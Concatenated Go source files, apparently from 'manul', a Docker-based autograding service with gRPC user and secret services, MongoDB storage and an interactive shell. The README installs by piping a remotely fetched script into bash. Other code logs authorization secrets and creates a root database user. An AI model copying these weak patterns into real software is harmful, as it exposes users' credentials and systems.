*Workdir) GetCwd() string { return path.Join(env.Base, env.Cwd) } func (env *Workdir) RemoveCwd() error { return os.RemoveAll(path.Join(env.Base, env.Cwd)) } func (env *Workdir) Split() (dir, file string) { return path.Split(env.GetCwd()) } func (env *Workdir) Path(filename string) string { return path.Join(env.Base, env.Cwd, filename) } func (env *Workdir) Remove(filename string) error { 
return os.RemoveAll(env.Path(filename)) } func (env *Workdir) Goto(dir ...string) *Workdir { dirs := []string{ env.Cwd, } dirs = append(dirs, dir...) env.Cwd = path.Join(dirs...) return env } func (env *Workdir) MkdirAll(filename string, perm os.FileMode) (err error) { dirTarget := env.Path(filename) if err = os.MkdirAll(dirTarget, perm); err != nil { log.Errorf("Create folder failed: %v", err) return } else { return nil } } func (env *Workdir) WriteFile(filename string, data []byte, perm os.FileMode) (err error) { tdir, tfile := path.Split(filename) dirTarget := path.Join(env.Base, env.Cwd, tdir) if err = os.MkdirAll(dirTarget, 0700); err != nil { log.Errorf("Create folder failed: %v", err) return } else { return ioutil.WriteFile(path.Join(dirTarget, tfile), data, perm) } } func (env *Workdir) ReadFile(filename string) ([]byte, error) { return ioutil.ReadFile(env.Path(filename)) } func (env *Workdir) Stat(filename string) (os.FileInfo, error) { return os.Stat(env.Path(filename)) } func (env *Workdir) Exists(filename string) bool { if _, err := env.Stat(filename); os.IsNotExist(err) { return false } else { return true } } func (env *Workdir) IsDir(filename string) bool { if mode, err := env.Stat(filename); os.IsNotExist(err) { return false } else { return mode.IsDir() } } func (env *Workdir) IsFile(filename string) bool { if mode, err := env.Stat(filename); os.IsNotExist(err) { return false } else { return !mode.IsDir() } } func (env *Workdir) ReadDir(filename string) ([]os.FileInfo, error) { return ioutil.ReadDir(env.Path(filename)) } func (env *Workdir) IterFiles(dir string, handler func(*file.File) error) (err error) { if !env.Exists(dir) { return errors.New("dir not exists") } if s, e := env.Stat(dir); e == nil { if s.IsDir() { if fl, err := env.ReadDir(dir); err != nil { log.Errorf("read dir %s(%s) failed: %v", dir, s.Name(), err) return err } else { for _, f := range fl { env.IterFiles(path.Join(dir, f.Name()), handler) } } } else { mode := s.Mode() size := 
s.Size() if data, e := env.ReadFile(dir); e != nil { log.Errorf("read file %s(%s) failed: %v", dir, s.Name(), err) } else { cpath, _ := path.Split(dir) meta := map[string]interface{}{ "perm": mode, } fh := &file.File{ Name: s.Name(), Path: cpath, Size: uint64(size), Meta: helpers.ToStruct(meta), Data: data, } handler(fh) } } } return nil } <file_sep>/* * The MIT License (MIT) * * Copyright (c) 2018 <NAME> <<EMAIL>> * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in all * copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE * SOFTWARE. * */ package helpers import ( "github.com/argcv/webeh/log" "runtime" "sync/atomic" ) type WaitGroupWithState struct { st int64 } func NewWaitGroupWithState() *WaitGroupWithState { return &WaitGroupWithState{ st: 0, } } func (wg *WaitGroupWithState) Add(delta int64) int64 { newSt := atomic.AddInt64(&(wg.st), delta) if newSt < 0 { log.Fatalf("ERROR: status is lower than 0!!! 
(%v)", newSt) } return newSt } func (wg *WaitGroupWithState) Done() int64 { return wg.Add(-1) } func (wg *WaitGroupWithState) State() int64 { return atomic.LoadInt64(&(wg.st)) } func (wg *WaitGroupWithState) Wait() { for wg.State() > 0 { runtime.Gosched() } } <file_sep>package shell import ( "gopkg.in/abiosoft/ishell.v2" ) func (e *Env) AddLogin() { cmd := &ishell.Cmd{ Name: "login", Help: "login", Func: func(c *ishell.Context) { c.Println("Login...: ", c.Args) }, } e.Sh.AddCmd(cmd) } <file_sep>#!/usr/bin/env bash if [ -z $GOPATH ]; then echo "error: env: GOPATH not exists!!" exit 1 fi ORG_DIR="$GOPATH/src/github.com/argcv" PROJ_DIR="$ORG_DIR/manul" if [ ! -d $PROJ_DIR ]; then mkdir -p $PROJ_DIR git clone <EMAIL>:argcv/manul.git $PROJ_DIR echo "Cloned to $PROJ_DIR" fi pushd $PROJ_DIR > /dev/null 2>&1 if [[ $(git status --porcelain) ]]; then echo "Found uncommitted change" exit 2 else echo "Update..." git pull origin fi popd > /dev/null 2>&1 <file_sep>package config import ( "fmt" "github.com/argcv/webeh/log" "github.com/pkg/errors" "github.com/spf13/viper" "os" "path/filepath" "strings" ) var ( kProjectName = "manul" ) // this function will search and load configurations func LoadConfig(path string) (err error) { viper.SetConfigName(kProjectName) viper.SetEnvPrefix(kProjectName) if path != "" { viper.SetConfigFile(path) } else { viper.AddConfigPath(".") viper.AddConfigPath("..") viper.AddConfigPath("$HOME/") viper.AddConfigPath(fmt.Sprintf("$HOME/.%s/", kProjectName)) viper.AddConfigPath("/etc/") viper.AddConfigPath(fmt.Sprintf("/etc/%s/", kProjectName)) if conf := os.Getenv(fmt.Sprintf("%s_CFG", strings.ToUpper(kProjectName))); conf != "" { viper.SetConfigFile(conf) } } err = viper.ReadInConfig() if _, ok := err.(viper.ConfigFileNotFoundError); !ok && err != nil { log.Errorf("Load configure failed: %s", err.Error()) return err } if conf := viper.ConfigFileUsed(); conf != "" { wd, _ := os.Getwd() if rel, _ := filepath.Rel(wd, conf); rel != "" && strings.Count(rel, 
"..") < 3 { conf = rel } log.Infof("Using config file: %s", conf) return nil } else { msg := "No configure file" log.Warnf(msg) return errors.New(msg) } } <file_sep>package server import ( "fmt" "github.com/argcv/go-argcvapis/app/manul/job" "github.com/argcv/go-argcvapis/app/manul/project" "github.com/argcv/go-argcvapis/app/manul/secret" "github.com/argcv/go-argcvapis/app/manul/user" "github.com/argcv/manul/config" "github.com/argcv/manul/service" "github.com/argcv/webeh/log" "github.com/grpc-ecosystem/grpc-gateway/runtime" "github.com/spf13/cobra" "golang.org/x/net/context" "google.golang.org/grpc" "net" "net/http" ) func NewManulRpcServerCommand() *cobra.Command { cmd := &cobra.Command{ Use: "serve", Short: "Rpc Server", RunE: func(cmd *cobra.Command, args []string) (err error) { rpcBind := config.GetRpcBind() rpcPort := config.GetRpcPort() httpBind := config.GetHttpBind() httpPort := config.GetHttpPort() log.Infof("The RPC Server starting.. %s:%d", rpcBind, rpcPort) log.Infof("The HTTP Server starting.. %s:%d", httpBind, httpPort) lis, err := net.Listen("tcp", fmt.Sprintf("%s:%d", rpcBind, rpcPort)) if err != nil { log.Infof("failed to listen: %v", err) return } maxRecvMsgSizeMB := config.GetRpcOptionMaxRecvMsgSizeMB() maxSendMsgSizeMB := config.GetRpcOptionMaxSendMsgSizeMB() opts := []grpc.ServerOption{ grpc.MaxRecvMsgSize(1024 * 1024 * maxRecvMsgSizeMB), grpc.MaxSendMsgSize(1024 * 1024 * maxSendMsgSizeMB), } log.Infof("[Option] MaxRecvMsgSize(mb): %d", maxRecvMsgSizeMB) log.Infof("[Option] MaxSendMsgSize(mb): %d", maxSendMsgSizeMB) grpcServer := grpc.NewServer(opts...) env, err := service.NewManulGlobalEnv() if err != nil { return err } // register servers here user.RegisterUserServiceServer(grpcServer, env.UserService) secret.RegisterSecretServiceServer(grpcServer, env.SecretService) project.RegisterProjectServiceServer(grpcServer, env.ProjectService) job.RegisterJobServiceServer(grpcServer, env.JobService) go func() { log.Infof("Sterted Rpc... 
%s:%d", rpcBind, rpcPort) grpcServer.Serve(lis) }() // http... listenString := fmt.Sprintf("%s:%d", httpBind, httpPort) ctx := context.Background() ctx, cancel := context.WithCancel(ctx) defer cancel() gwmux := runtime.NewServeMux() //err = pb.RegisterTasksHandlerFromEndpoint(ctx, gwmux, fmt.Sprintf("%s:%d", "127.0.0.1", rpcPort), // []grpc.DialOption{grpc.WithInsecure()}, //) rpcProxy := fmt.Sprintf("%s:%d", "127.0.0.1", rpcPort) // bind endpoints start err = user.RegisterUserServiceHandlerFromEndpoint(ctx, gwmux, rpcProxy, []grpc.DialOption{grpc.WithInsecure()}, ) if err != nil { fmt.Printf("bind endpoint for user failed: %v\n", err) return } err = secret.RegisterSecretServiceHandlerFromEndpoint(ctx, gwmux, rpcProxy, []grpc.DialOption{grpc.WithInsecure()}, ) if err != nil { fmt.Printf("bind endpoint for secret failed: %v\n", err) return } err = project.RegisterProjectServiceHandlerFromEndpoint(ctx, gwmux, rpcProxy, []grpc.DialOption{grpc.WithInsecure()}, ) if err != nil { fmt.Printf("bind endpoint for project failed: %v\n", err) return } err = job.RegisterJobServiceHandlerFromEndpoint(ctx, gwmux, rpcProxy, []grpc.DialOption{grpc.WithInsecure()}, ) if err != nil { fmt.Printf("bind endpoint for job failed: %v\n", err) return } // bind endpoints finished log.Infof(fmt.Sprintf("Sterted http:... 
%s", listenString)) err = http.ListenAndServe(listenString, http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { // hosting request here gwmux.ServeHTTP(w, r) })) if err != nil { panic(err) } return }, } return cmd } <file_sep>package shell import ( "gopkg.in/abiosoft/ishell.v2" "strings" ) type Env struct { Sh *ishell.Shell prompts []string } func NewEnv() (e *Env) { shell := ishell.New() e = &Env{ Sh: shell, prompts: []string{}, } e.init() return } func (e *Env) PopPrompt() { if len(e.prompts) > 1 { e.prompts = e.prompts[0 : len(e.prompts)-1] e.Sh.SetPrompt(e.prompts[len(e.prompts)-1]) } else { e.Printf("Unexpected PopPrompt...?") } } func (e *Env) init() { sh := e.Sh // display welcome info. e.Println("Manul Interactive.") e.Println("Type Help to get more information") e.PushPrompt("manul > ") sh.NotFound(func(c *ishell.Context) { c.Printf("Command Not Recognized : [%v]\n", strings.Join(c.Args, "], [")) }) e.AddLogin() e.AddSetup() } <file_sep>FROM golang:1.9.3 as builder ADD . 
/go/src/github.com/argcv/manul RUN cd /go/src/github.com/argcv/manul && bash ./build.sh FROM scratch # x509: failed to load system roots and no roots provided COPY --from=builder /etc/ssl/certs/ca-certificates.crt /etc/ssl/certs/ca-certificates.crt #COPY --from=builder /go/bin/sunlab-api /sunlab-api COPY --from=builder /go/src/github.com/argcv/manul/manul /manul COPY --from=builder /go/src/github.com/argcv/manul/manul-entrypoint /manul-entrypoint EXPOSE 35000 EXPOSE 35001 ENTRYPOINT ["/manul"] <file_sep># manul A docker based auto grading system ## Install or Update ```bash curl https://raw.githubusercontent.com/argcv/manul/master/get.sh | bash ``` <file_sep>package shell import ( "gopkg.in/abiosoft/ishell.v2" "github.com/argcv/manul/client/mail" "github.com/argcv/webeh/log" "github.com/davecgh/go-spew/spew" ) func (e *Env) AddSmtp() { cmd := &ishell.Cmd{ Name: "smtp", Help: "smtp sender", Func: func(c *ishell.Context) { if session, err := mail.NewSMTPSession(); err != nil { log.Errorf("new smtp session failed: %v", err) } else { session.DefaultFrom() session.To("<EMAIL>") session.Subject("Hello~") session.HtmlBody("<h1>Some Content Here</h1><p>Hello</p>") spew.Dump(session) if e := session.Perform(); e != nil { log.Errorf("error: %v", e) } } c.Println("Sent....: ", c.Args) }, } e.Sh.AddCmd(cmd) } <file_sep>package shell import ( "gopkg.in/abiosoft/ishell.v2" "strings" ) func (e *Env) AddCmd(cmd *ishell.Cmd) { e.Sh.AddCmd(cmd) } func (e *Env) Run() { e.Sh.Run() } func (e *Env) Process(args ...string) { e.Sh.Process(args...) } // forward prints func (e *Env) Println(val ...interface{}) { e.Sh.Println(val...) } func (e *Env) Print(val ...interface{}) { e.Sh.Print(val...) } func (e *Env) Printf(format string, val ...interface{}) { e.Sh.Printf(format, val...) 
} func (e *Env) PushPrompt(str string) { e.prompts = append(e.prompts, str) e.Sh.SetPrompt(str) } func (e *Env) ConfirmRepl(c *ishell.Context, q string, or bool) bool { if or { e.PushPrompt("[Y/n] :") } else { e.PushPrompt("[y/N] :") } c.Println(q) defer e.PopPrompt() rtMsg := strings.TrimSpace(c.ReadLine()) if rtMsg == "n" || rtMsg == "N" { return false } else if rtMsg == "y" || rtMsg == "Y" { return true } else { return or } } func (e *Env) GetStringRepl(c *ishell.Context, q, prompt string) string { return e.GetStringReplFunc(c, q, prompt, func(s string) bool { return true }) } func (e *Env) GetStringReplNonEmpty(c *ishell.Context, q, prompt string) string { return e.GetStringReplFunc(c, q, prompt, func(s string) bool { return len(strings.TrimSpace(s)) > 0 }) } func (e *Env) GetStringReplFunc(c *ishell.Context, q, prompt string, f func(string) bool) string { if len(prompt) > 0 { e.PushPrompt(prompt) defer e.PopPrompt() } c.Println(q) var rtMsg string for rtMsg = c.ReadLine(); !(f(rtMsg)); rtMsg = c.ReadLine() { c.Println("Invalid Input") } return rtMsg } <file_sep>package helpers import ( "os" "path/filepath" ) func GetPathOfSelf() (dir string, err error) { dir, err = filepath.Abs(filepath.Dir(os.Args[0])) return } <file_sep>package model import ( "github.com/argcv/go-argcvapis/status/errcodes" "github.com/argcv/go-argcvapis/status/status" "github.com/golang/protobuf/ptypes/any" ) /* Status is a wrapper to pb-status */ type Status struct { Code errcodes.Code Message string Details []*any.Any } func (st *Status) ToPbStatus() (pbSt *status.Status) { pbSt = &status.Status{ Code: st.Code, Message: st.Message, Details: st.Details, } return } func FromPbStatus(st *status.Status) *Status { return &Status{ Code: st.Code, Message: st.Message, Details: st.Details, } } /* OrderType is an option type */ type OrderType int const ( OrderTypeUnset OrderType = iota OrderTypeAsc OrderTypeDesc ) <file_sep>#!/usr/bin/env bash mongo admin --eval 'db.createUser({ user: "manul", pwd: 
"<PASSWORD>", roles: [ { role: "userAdminAnyDatabase", db: "admin" }, "root","dbAdmin","dbOwner" ] });' echo "Created User manul" echo "db name: admin" echo "user: manul" echo "pass: <PASSWORD>" <file_sep>package service import ( "context" "fmt" pb "github.com/argcv/go-argcvapis/app/manul/secret" "github.com/argcv/manul/client/mongo" "github.com/argcv/manul/helpers" "github.com/argcv/manul/model" "github.com/argcv/webeh/log" "github.com/pkg/errors" "gopkg.in/mgo.v2/bson" ) type SecretServiceImpl struct { env *Env } func (s *SecretServiceImpl) listSecret(uid string, offset, size int) (sl []model.Secret, err error) { mc := s.env.SpawnMgoCli() defer mc.Close() q := bson.M{} sort := []string{"_id"} if ouid, err := mongo.SafeToObjectId(uid); err == nil { q["user_id"] = ouid } err = mc.Search(DbSecretColl, q, sort, offset, size, &sl) return } func (s *SecretServiceImpl) findSecret(uid string) (secret *model.Secret, err error) { mc := s.env.SpawnMgoCli() defer mc.Close() q := bson.M{} if ouid, e := mongo.SafeToObjectId(uid); e == nil { q["user_id"] = ouid } log.Infof("query: %v", q) err = mc.One(DbSecretColl, q, &secret) return } func (s *SecretServiceImpl) verifySecret(uid, secret string) bool { if ret, err := s.findSecret(uid); err != nil { log.Errorf("find secret failed!!: %v", err) return false } else { return ret.Secret == secret } } func (s *SecretServiceImpl) updateSecret(uid string) (ret *model.Secret, err error) { mc := s.env.SpawnMgoCli() defer mc.Close() q := bson.M{} ret = &model.Secret{} if ouid, e := mongo.SafeToObjectId(uid); e == nil { q["user_id"] = ouid ret.UserId = ouid } ret.Secret = helpers.RandomString(32, helpers.CharsetHex) ret.UpdateTime() err = mc.Upsert(DbSecretColl, q, ret) return } func (s *SecretServiceImpl) tryUpdateSecret(uid, secret, temp_token string) (ret *model.Secret, err error) { if ret, err := s.findSecret(uid); err != nil { return nil, errors.New(fmt.Sprintf("secret not found")) } else if ret.Secret == secret || ret.TempToken == 
temp_token { return s.updateSecret(uid) } else { return nil, errors.New(fmt.Sprintf("invalid script")) } } /* TODO:Not implemented yet */ func (s *SecretServiceImpl) UpdateSecret(context.Context, *pb.UpdateSecretRequest) (*pb.UpdateSecretResponse, error) { return nil, errors.New("implement me") } /* TODO:Not implemented yet */ func (s *SecretServiceImpl) ForgotSecret(context.Context, *pb.ForgotSecretRequest) (*pb.ForgotSecretResponse, error) { return nil, errors.New("implement me") } <file_sep>package service import ( "fmt" pb "github.com/argcv/go-argcvapis/app/manul/user" "github.com/argcv/go-argcvapis/status/errcodes" "github.com/argcv/manul/client/mongo" "github.com/argcv/manul/model" "github.com/argcv/webeh/log" "github.com/pkg/errors" "golang.org/x/net/context" "google.golang.org/grpc/metadata" "gopkg.in/mgo.v2/bson" "strings" "time" ) type UserServiceImpl struct { env *Env } func (u *UserServiceImpl) findUserByName(name string) (user *model.User, err error) { mc := u.env.SpawnMgoCli() defer mc.Close() q := bson.M{ "name": name, } err = mc.One(DbUserColl, q, &user) return } func (u *UserServiceImpl) findUserById(id string) (user *model.User, err error) { oid, err := mongo.SafeToObjectId(id) if err != nil { return nil, err } mc := u.env.SpawnMgoCli() defer mc.Close() q := bson.M{ "_id": oid, } err = mc.One(DbUserColl, q, &user) return } func (u *UserServiceImpl) findUserByMixedId(q string) (user *model.User, err error) { if strings.HasPrefix(q, "$") && mongo.IsObjectIdHex(q[1:]) { return u.findUserById(q[1:]) } else { return u.findUserByName(q) } } func (u *UserServiceImpl) findUserByIdOrName(id, name string) (user *model.User, err error) { if mongo.IsObjectIdHex(id) { return u.findUserById(id) } else { return u.findUserByName(name) } } func (u *UserServiceImpl) authUser(id, name, secret string) (user *model.User, err error) { user = &model.User{} if id != "" { if user, err = u.findUserById(id); err != nil { log.Infof("find failed: %v", err) return } } else { 
if user, err = u.findUserByName(name); err != nil { log.Infof("find failed: %v", err) return } } if verify := u.env.SecretService.verifySecret(user.Id.Hex(), secret); verify { return } else { return nil, errors.New("invalid_secret") } } func (u *UserServiceImpl) ParseAuthInfo(ctx context.Context, auth *pb.AuthToken) (user *model.User, err error) { var id string var name string var secret string // try extract from auth first if auth != nil { id = auth.Id name = auth.Name secret = auth.Secret } // try extract from metadata (header Authorization) if md, ok := metadata.FromIncomingContext(ctx); ok { if authl := md.Get("authorization"); len(authl) > 0 { auth := authl[0] log.Infof("auth: %v", auth) kv := strings.Split(auth, ":") if len(kv) == 3 { id = kv[0] name = kv[1] secret = kv[2] } else { log.Warnf("Invalid Authorization Code: %v, skip...", auth) } } } else { log.Warnf("Get Metadata FAILED!!!") } return u.authUser(id, name, secret) } // List users by options func (u *UserServiceImpl) listUsers(option *model.UserServiceFilterOption, offset, size int) (ul []model.User, err error) { mc := u.env.SpawnMgoCli() defer mc.Close() q := bson.M{} var sort []string if option != nil { if len(option.UserType) > 0 { q["user_type"] = mongo.InQuery(option.UserType) } if len(option.Name) > 0 { q["name"] = option.Name } if option.Order == model.OrderTypeAsc { // asc sort = []string{"_id"} } else if option.Order == model.OrderTypeDesc { // desc sort = []string{"-_id"} } } err = mc.Search(DbUserColl, q, sort, offset, size, &ul) return } func (u *UserServiceImpl) countUsers(option *model.UserServiceFilterOption) (count int, err error) { mc := u.env.SpawnMgoCli() defer mc.Close() q := bson.M{} if option != nil { if len(option.UserType) > 0 { q["user_type"] = mongo.InQuery(option.UserType) } if len(option.Name) > 0 { q["name"] = option.Name } } return mc.Count(DbUserColl, q) } func (u *UserServiceImpl) ListUsers(ctx context.Context, req *pb.ListUsersRequest) (ret *pb.ListUsersResponse, e 
error) { if _, err := u.ParseAuthInfo(ctx, req.Auth); err != nil { st := model.Status{ Code: errcodes.Code_PERMISSION_DENIED, Message: fmt.Sprintf("invalid auth: %v", err.Error()), } ret = &pb.ListUsersResponse{ Success: false, Result: &pb.ListUsersResponse_Error{ Error: st.ToPbStatus(), }, } return } else { offset := req.Offset size := req.Size if offset < 0 { offset = 0 } if size == 0 { size = 10 } opt := model.ParseUserServiceFilterOption(req.Filter) ul, e1 := u.listUsers(opt, int(offset), int(size)) cnt, e2 := u.countUsers(opt) pbul := []*pb.User{} for _, cu := range ul { pbul = append(pbul, cu.ToPbUser()) } if e1 != nil || e2 != nil { st := model.Status{ Code: errcodes.Code_INTERNAL, Message: fmt.Sprintf("%v;%v", e1, e2), } ret = &pb.ListUsersResponse{ Success: false, Result: &pb.ListUsersResponse_Error{ Error: st.ToPbStatus(), }, } return } else { ret = &pb.ListUsersResponse{ Success: true, Result: &pb.ListUsersResponse_Users{ Users: &pb.Users{ Users: pbul, Total: int32(cnt), Offset: offset, Size: size, }, }, } } return } } func (u *UserServiceImpl) createUser(name, displayName, email string, userType pb.UserType, createdBy string) (user *model.User, secret *model.Secret, err error) { mc := u.env.SpawnMgoCli() defer mc.Close() q := bson.M{} q["name"] = name uid := mongo.NewObjectId() if mc.Exists(DbUserColl, q) { user = nil secret = nil err = errors.New(fmt.Sprintf("user_%s_was_created", name)) return } user = &model.User{ Id: uid, UserType: userType, Name: name, Email: email, CreateTime: time.Now(), UpdatedTime: time.Now(), CreatedBy: createdBy, } if err = mc.Insert(DbUserColl, user); err == nil { log.Infof("Created user %s by %s, creating secret...", name, createdBy) if secret, err = u.env.SecretService.updateSecret(uid.Hex()); err != nil { log.Errorf("Init secret failed...%v", err) return } else { log.Infof("Created secret for user %s", name) } } return } func (u *UserServiceImpl) CreateUser(ctx context.Context, req *pb.CreateUserRequest) (ret 
*pb.CreateUserResponse, e error) { if ucli, err := u.ParseAuthInfo(ctx, req.Auth); err != nil || ucli.UserType != model.UserType_ADMIN { st := model.Status{ Code: errcodes.Code_PERMISSION_DENIED, Message: fmt.Sprintf("%v", err), } ret = &pb.CreateUserResponse{ Success: false, Result: &pb.CreateUserResponse_Error{ Error: st.ToPbStatus(), }, } return } else { if utar, _, err := u.createUser(req.Name, req.DisplayName, req.Email, req.UserType, ucli.Name); err != nil { st := model.Status{ Code: errcodes.Code_INTERNAL, Message: fmt.Sprintf("%v", err), } ret = &pb.CreateUserResponse{ Success: false, Result: &pb.CreateUserResponse_Error{ Error: st.ToPbStatus(), }, } return } else { ret = &pb.CreateUserResponse{ Success: true, Result: &pb.CreateUserResponse_User{ User: utar.ToPbUser(), }, } } return } } // check by id OR name // if the id is exists, it will skip name // assume user is valid func (u *UserServiceImpl) updateUser(id, name string, user *model.User) (err error) { if id == "" && name == "" { log.Infof("Both id and name are empty") return errors.New("bad_request") } mc := u.env.SpawnMgoCli() defer mc.Close() q := bson.M{} if id != "" && mongo.IsObjectIdHex(id) { q["_id"] = mongo.ToObjectIdHex(id) } else if name != "" { q["name"] = name } o := bson.M{} if user.Name != "" { o["name"] = user.Name } if user.DisplayName != "" { o["display_name"] = user.DisplayName } if user.Email != "" { o["email"] = user.Email } o["updated_time"] = time.Now() if !mc.Exists(DbUserColl, q) { user = nil err = errors.New(fmt.Sprintf("user_%s_not_exists", name)) return } return mc.Update(DbUserColl, q, mongo.SetOperator(o)) } func (u *UserServiceImpl) UpdateUser(ctx context.Context, req *pb.UpdateUserRequest) (ret *pb.UpdateUserResponse, e error) { retDenied := func(err error) (ret *pb.UpdateUserResponse, e error) { st := model.Status{ Code: errcodes.Code_PERMISSION_DENIED, Message: fmt.Sprintf("%v", err), } ret = &pb.UpdateUserResponse{ Success: false, Result: 
&pb.UpdateUserResponse_Error{ Error: st.ToPbStatus(), }, } return } if ucli, err := u.ParseAuthInfo(ctx, req.Auth); err != nil { return retDenied(err) } else if (req.Id != ucli.Id.Hex() && req.Name != ucli.Name) && ucli.UserType != model.UserType_ADMIN { // if NOT self, And NOT admin return retDenied(err) } else if req.Update == nil || (req.Id == "" && req.Name == "") { errMsg := []string{} if req.Id == "" { errMsg = append(errMsg, "id is empty") } if req.Name == "" { errMsg = append(errMsg, "name is empty") } if req.Update == nil { errMsg = append(errMsg, "update body is empty") } st := model.Status{ Code: errcodes.Code_INVALID_ARGUMENT, Message: strings.Join(errMsg, ";"), } ret = &pb.UpdateUserResponse{ Success: false, Result: &pb.UpdateUserResponse_Error{ Error: st.ToPbStatus(), }, } return } else { uup := &model.User{ DisplayName: req.Update.DisplayName, } updatedName := req.Name if ucli.UserType == model.UserType_ADMIN { uup.Email = req.Update.Email if req.Update.Name != "" { uup.Name = req.Update.Name updatedName = req.Update.Name } } if err := u.updateUser(req.Id, req.Name, uup); err != nil { st := model.Status{ Code: errcodes.Code_INTERNAL, Message: fmt.Sprintf("%v", err), } ret = &pb.UpdateUserResponse{ Success: false, Result: &pb.UpdateUserResponse_Error{ Error: st.ToPbStatus(), }, } return } else { if utar, err := u.findUserByIdOrName(req.Id, updatedName); err != nil { st := model.Status{ Code: errcodes.Code_NOT_FOUND, Message: err.Error(), } ret = &pb.UpdateUserResponse{ Success: false, Result: &pb.UpdateUserResponse_Error{ Error: st.ToPbStatus(), }, } return } else { ret = &pb.UpdateUserResponse{ Success: true, Result: &pb.UpdateUserResponse_User{ User: utar.ToPbUser(), }, } return } } return } } func (u *UserServiceImpl) GetUser(ctx context.Context, req *pb.GetUserRequest) (ret *pb.GetUserResponse, e error) { if ucli, err := u.ParseAuthInfo(ctx, req.Auth); err != nil { st := model.Status{ Code: errcodes.Code_PERMISSION_DENIED, Message: 
fmt.Sprintf("invalid auth: %v", err.Error()), } ret = &pb.GetUserResponse{ Success: false, Result: &pb.GetUserResponse_Error{ Error: st.ToPbStatus(), }, } return } else if req.Id == "$" { ret = &pb.GetUserResponse{ Success: true, Result: &pb.GetUserResponse_User{ User: ucli.ToPbUser(), }, } return } else { if utar, err := u.findUserByIdOrName(req.Id, req.Name); err != nil { st := model.Status{ Code: errcodes.Code_NOT_FOUND, Message: err.Error(), } ret = &pb.GetUserResponse{ Success: false, Result: &pb.GetUserResponse_Error{ Error: st.ToPbStatus(), }, } return } else { ret = &pb.GetUserResponse{ Success: true, Result: &pb.GetUserResponse_User{ User: utar.ToPbUser(), }, } return } } } /* TODO:Not implemented yet */ func (u *UserServiceImpl) DeleteUser(context.Context, *pb.DeleteUserRequest) (*pb.DeleteUserResponse, error) { return nil, errors.New("implement me") } <file_sep>package config import ( "github.com/argcv/manul/client/mongo" "time" ) func GetDBMongoAddrs() []string { defaultAddrs := []string{"localhost:27017"} addrs := getStringSliceOrDefault(KeyDBMongoAddrs, defaultAddrs) if len(addrs) == 0 { addrs = defaultAddrs } return addrs } func GetDBMongoAuth() *mongo.Auth { if getBoolOrDefault(KeyDBMongoPerformAuth, false) { // with auth source := getStringOrDefault(KeyDBMongoAuthDatabase, "") user := getStringOrDefault(KeyDBMongoAuthUser, "admin") pass := getStringOrDefault(KeyDBMongoAuthPass, "") mech := getStringOrDefault(KeyDBMongoAuthMechanism, "") return &mongo.Auth{ Source: source, Username: user, Password: <PASSWORD>, Mechanism: mech, } } return nil } func GetDBMongoTimeout() time.Duration { dur := time.Duration(getInt64OrDefault(KeyDBMongoTimeoutSec, 0)) return dur * time.Second } func InitMongoClient() (client *mongo.Client, err error) { addrs := GetDBMongoAddrs() auth := GetDBMongoAuth() db := getStringOrDefault(KeyDBMongoDatabase, "") if db == "" && auth != nil { db = auth.Source } timeout := GetDBMongoTimeout() return mongo.NewMongoClient(addrs, db, 
timeout, auth) } <file_sep>package shell <file_sep>package model import ( pb "github.com/argcv/go-argcvapis/app/manul/project" "github.com/argcv/manul/helpers" "github.com/argcv/webeh/log" "github.com/davecgh/go-spew/spew" "gopkg.in/yaml.v2" "io/ioutil" ) var ( ProjectConfigDefaultStages = []string{ "install", "build", "test", } ) type ProjectJobConfig struct { Script string `bson:"script,omitempty" json:"script" yaml:"script"` Scripts []string `bson:"scripts,omitempty" json:"scripts" yaml:"scripts"` } type ProjectChecklistElem struct { Path string `bson:"path,omitempty" json:"path" yaml:"check_list"` TargetType int `bson:"target_type,omitempty" json:"target_type" yaml:"target_type"` } type ProjectConfig struct { Image string `bson:"image,omitempty" json:"image" yaml:"image"` Env []string `bson:"env,omitempty" json:"env" yaml:"env"` Volume []string `bson:"volume,omitempty" json:"volume" yaml:"volume"` Stages []string `bson:"stage,omitempty" json:"stage" yaml:"stage"` Jobs map[string]ProjectJobConfig `bson:"job,omitempty" json:"job" yaml:"job"` Checklist []*pb.ProjectChecklistElem `bson:"check_list,omitempty" json:"check_list" yaml:"check_list"` TimeoutSec uint64 `bson:"timeout_sec,omitempty" json:"timeout_sec" yaml:"timeout_sec"` MaximumCpu uint64 `bson:"maximum_cpu,omitempty" json:"maximum_cpu" yaml:"maximum_cpu"` MaximumMemMb uint64 `bson:"maximum_mem_mb,omitempty" json:"maximum_mem_mb" yaml:"maximum_mem_mb"` } func LoadProjectConfig(path string) (*ProjectConfig, error) { if data, err := ioutil.ReadFile(path); err != nil { return nil, err } else { cfg := &ProjectConfig{} err = yaml.Unmarshal([]byte(data), cfg) if err != nil { return nil, err } else { return cfg, err } } } func (c *ProjectConfig) ToBashScriptsExecutor() *helpers.BashScriptsExecutor { e := helpers.NewBashScriptsExecutor("", c.Env...) 
